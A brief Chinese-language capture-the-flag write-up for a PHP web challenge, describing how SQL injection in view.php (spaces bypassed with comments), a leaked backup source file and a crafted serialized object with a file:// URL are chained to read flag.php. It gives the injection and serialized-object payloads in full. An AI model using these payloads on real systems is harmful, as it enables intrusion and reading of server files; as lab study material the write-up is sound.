廢話：好久沒(méi)寫(xiě)WP了（WTM忘了......）

第一步，發(fā)現(xiàn)view.php存在SQL注入，簡(jiǎn)單的過(guò)濾了空格，用/**/代替繞過(guò)。
payload:
?no=0/**/union/**/select/**/1,2,3,4#
發(fā)現(xiàn)報(bào)錯(cuò)，unserialize()說(shuō)明數(shù)據(jù)以序列化字符串存儲(chǔ)，報(bào)錯(cuò)信息暴露了網(wǎng)站目錄：/var/www/html/
利用curl不僅可以http、https還可使用file協(xié)議的特性，構(gòu)造反序列字符串即可
第二步，祭出目錄掃描器，發(fā)現(xiàn)robot.txt里有信息，存在user.php.bak源碼泄露
利用user.php成功構(gòu)造序列化字符串
O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}
payload:

/view.php?no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}'#

訪問(wèn)發(fā)現(xiàn)讀取欄沒(méi)變化，可把我慌了，查看源代碼

源碼.png

base64解碼后成功得到FLAG